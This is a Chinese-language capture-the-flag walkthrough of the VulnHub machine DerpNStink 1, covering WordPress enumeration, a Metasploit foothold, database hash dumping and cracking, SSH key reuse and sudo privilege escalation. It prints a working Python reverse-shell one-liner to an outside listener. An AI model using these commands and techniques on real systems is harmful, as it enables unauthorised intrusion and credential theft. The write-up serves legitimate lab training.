DERPNSTINK-1靶机详解

靶机基本信息

靶机地址：https://www.vulnhub.com/entry/derpnstink-1,221/
靶机难度：中等（CTF）靶机描述：这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器，同时还带有一些较小的曲线球，但是没有什么花哨的。坚持经典的黑客方法，并列举所有内容！目标：找到所有4个标志，最终将您带到完全root访问权限

主机发现

也可以使用nmap进行主机发现

信息收集

全端口扫描：

详细的扫描：

访问http://192.168.255.9，查看源代码：

发现flag1

访问http://192.168.255.9/webnotes/info.txt

翻译： @stinky，确保使用本地 dns 更新您的主机文件，以便可以在新的 derpnstink 博客上线之前访问它

意思是要我们更新本地的dns服务，才能访问博客

修改本地的hosts文件：

命令：sudo vim /etc/hosts

192.168.255.9 derpnstink.local

目录扫描：

dirb http://derpnstink.local/

部分结果：

从这个目录来看，就可以确认为worpress站

访问http://derpnstink.local/weblog/wp-admin/admin.php

尝试弱口令登录：

admin/admin

漏洞发现与利用

使用wpscan进行扫描：

命令：wpscan --url http://derpnstink.local/weblog/

结果：

使用AWVS扫描：

利用MSF：

拿个稳定shell：

反弹shell代码：

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.255.129",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

反弹成功：

cd …/…/… —来到/var/www/html/weblog目录枚举信息

cat wp-config.php

mysql账号密码获得：
root
mysql

登录mysql信息枚举：

后台枚举前面dirb扫描出：
http://derpnstink.local/php/phpmyadmin/

访问，使用刚才从wp-config.php文件中获取的用户名密码登录

show databases;

use wordpress;

show tables;

select * from wp_users;

获得账户密码：

unclestinky

$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41

admin

$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

爆破密码：

echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > 1.txt

用hash-identifier值去查看是什么类型的密码加密

使用暴破出的用户名/密码：unclestinky/wedgie57进行登录

之前目录爆破出来的后台路径：http://derpnstink.local/weblog/wp-admin/

利用刚才爆破出来的账户密码进行登录，登录成功后发现flag2：

在靶机home目录下发现两个用户，mrderp/stinky

利用这两个用户名结合之前爆破出来的密码wedgie57

尝试ssh登录：

根据之前的端口扫描结果，这个靶机还开放ftp服务

尝试ftp登录：

1、对于mrderp这个用户名：

登录失败

2、对于stinky这个用户名

查看key.txt的内容：

这是ssh的key密钥，保存到本地key.txt文件中

尝试ssh登录：

成功获取flag3

权限提升

查看内核版本信息：lsb_release -a

这个系统版本可使用cve-2021-4034：

参考文章：https://blog.csdn.net/laobanjiull/article/details/122715651

这种我尝试过，尝试不成功

过滤语法：http.request.method == "POST"

获取账户：mrderp，密码：derpderpderpderpderpderpderp

利用刚才获取的账户密码登录，：

写入脚本覆盖derpy：

cd /tmp

vi test.sh

代码：

#!/bin/bash
bash -i

读取root目录下Desktop的flag.txt：

免责声明：本文章涉及的知识和技能仅用于学习研究，如有用于非法途径或未被授权的真实网络环境，所造成的后果及连带责任自行承担，与本文作者无关，倡导把安全知识和技能用于正当、正规、正义的途径。